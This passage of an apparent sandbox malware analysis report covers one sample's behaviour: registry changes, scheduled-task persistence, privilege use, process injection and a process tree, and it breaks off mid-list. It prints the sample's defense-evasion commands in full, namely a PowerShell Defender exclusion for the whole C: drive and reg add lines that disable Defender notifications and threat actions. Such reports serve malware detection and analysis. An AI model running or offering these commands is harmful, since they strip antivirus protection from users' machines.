Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1728297608" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows C:\Windows\System32\mousocoreworker.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\hh.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\$77Redownloader.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4728 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 4728 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 4728 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 4632 wrote to memory of 3984 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 4632 wrote to memory of 3984 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 3984 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3984 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3984 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 3984 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 3984 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 3984 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 3628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3984 wrote to memory of 4292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3984 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 3984 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 3984 wrote to memory of 3228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 3984 wrote to memory of 3228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 3984 wrote to memory of 3228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 3984 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 1484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 1484 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3984 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3984 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4748 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe C:\Windows\SYSTEM32\schtasks.exe
PID 4748 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3228 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
PID 3228 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
PID 3984 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
PID 3984 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
PID 3984 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe
PID 3984 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3984 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2728 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe"

C:\Users\$77main1.exe

"C:\Users\$77main1.exe" 0

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D8C.tmp\7D8D.tmp\7D8E.bat C:\Users\$77main1.exe 0"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-MpPreference -ExclusionPath 'C:\' -Force

C:\Users\$77Redownloader.exe

"C:\Users\$77Redownloader.exe" -o"C:\Users\Admin\AppData\Local\Microsoft\Windows" -y

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatIdDefaultAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147772079" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147735505" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatIdDefaultAction" /v "2147745502" /t REG_SZ /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t "REG_DWORD" /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "5" /t "REG_SZ" /d "6" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "1" /t "REG_SZ" /d "6" /f

C:\Windows\system32\timeout.exe

timeout 10

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe"

C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe"

C:\Windows\system32\schtasks.exe

